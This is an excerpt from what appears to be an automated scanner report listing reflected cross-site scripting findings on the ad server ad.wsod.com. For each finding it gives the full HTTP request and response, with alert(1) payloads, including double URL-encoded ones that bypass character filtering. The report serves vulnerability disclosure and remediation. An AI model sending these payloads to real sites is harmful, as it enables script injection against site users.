Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.2084487870534576?click=http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L; fp=184372:eq:2:CS:10:3:1289925656:1:46

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:35:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:35:20 GMT; path=/
Set-Cookie: i_1=46:1354:798:44:0:32947:1290209720:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:35:20 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 730

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15ljnna42/M=757168.14413522.14266813.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1290214461/L=czMofdG_bJL9SQS9TNcPQwgcrnoX2kznABwAB9wc/B=aPIEAkJe5hQ-/J=1290207261066372/K=0W5te92hxHgwSAHJM5kSlg/A=6192643/R=0/*&d2e20'-alert(1)-'7aac6d5594e=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.798.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more!"
...[SNIP]...

2.47. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db92e%2522%253balert%25281%2529%252f%252fe91708cc198 was submitted in the REST URL parameter 2. This input was echoed as db92e";alert(1)//e91708cc198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357db92e%2522%253balert%25281%2529%252f%252fe91708cc198/475.0.iframe.200x33/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357db92e";alert(1)//e91708cc198/475.0.iframe.200x33/1290209579**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b3e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec39f7a1a8ef was submitted in the REST URL parameter 2. This input was echoed as 3b3e5"><script>alert(1)</script>c39f7a1a8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313573b3e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec39f7a1a8ef/475.0.iframe.200x33/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313573b3e5"><script>alert(1)</script>c39f7a1a8ef/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67d47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e3f3a3635d was submitted in the REST URL parameter 3. This input was echoed as 67d47"><script>alert(1)</script>2e3f3a3635d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3367d47%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2e3f3a3635d/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x3367d47"><script>alert(1)</script>2e3f3a3635d/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae354%2522%253balert%25281%2529%252f%252f424e1783b9d was submitted in the REST URL parameter 3. This input was echoed as ae354";alert(1)//424e1783b9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33ae354%2522%253balert%25281%2529%252f%252f424e1783b9d/1290207264971902 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33ae354";alert(1)//424e1783b9d/1290209581**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b84c0"><script>alert(1)</script>a09472ff739 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*b84c0"><script>alert(1)</script>a09472ff739 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L|19:318:494:29:0:32731:1290036036:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2362

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
oe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*b84c0"><script>alert(1)</script>a09472ff739http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f52c"-alert(1)-"37bd5be3146 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*7f52c"-alert(1)-"37bd5be3146 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L|19:318:494:29:0:32731:1290036036:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:32:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2332

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
oe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*7f52c"-alert(1)-"37bd5be3146">
...[SNIP]...

2.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4dd2"-alert(1)-"7f1a0a0fe72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a4dd2"-alert(1)-"7f1a0a0fe72=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L|19:318:494:29:0:32731:1290036036:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2338

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
e3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&a4dd2"-alert(1)-"7f1a0a0fe72=1">
...[SNIP]...

2.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc74e"><script>alert(1)</script>405f7dc3d84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&dc74e"><script>alert(1)</script>405f7dc3d84=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://finance.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L|19:318:494:29:0:32731:1290036036:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2368

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
e3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*&dc74e"><script>alert(1)</script>405f7dc3d84=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of the 10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86ce6'-alert(1)-'7a6a2b33397 was submitted in the 10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**;10,1,102,64;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*86ce6'-alert(1)-'7a6a2b33397 HTTP/1.1
Accept: */*
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207264971902?click=http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.wsod.com
Proxy-Connection: Keep-Alive
Cookie: fp=184372:eq:2:CS:10:3:1289925656:1:46; u=4cdc67692496d; i_1=46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L|19:318:494:29:0:32731:1290036045:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4cdc67692496d; expires=Sun, 19-Dec-2010 23:33:21 GMT; path=/
Set-Cookie: i_1=46:475:844:44:0:32947:1290209601:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; expires=Sun, 19-Dec-2010 23:33:21 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 730

   function wsod_image() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15joe3ap7/M=757168.14056065.13990780.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1290214464/L=9h66cdG_R1f9SQS9TNcPQwJErnoX2kznACAADboO/B=xuwFAkJe5hI-/J=1290207264971902/K=k3t4Xnp2Coq5QY5G3IYSoA/A=5956662/R=0/*86ce6'-alert(1)-'7a6a2b33397http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.844.iframe.200x33/**;10.1102;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more
...[SNIP]...

2.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272** [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1290207272**

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0 was submitted in the REST URL parameter 2. This input was echoed as 8332a"><script>alert(1)</script>8cdd98fbef0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313578332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8cdd98fbef0/475.0.iframe.200x33/1290207272** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4cdc67692496d; i_1=46:1354:692:44:0:32946:1290207277:L|46:474:207:0:0:32946:1290207270:L|19:318:597:29:0:32731:1290036092:L; fp=184372:eq:2:CS:10:3:1289925656:1:46;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Fri, 19 Nov 2010 23:33:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
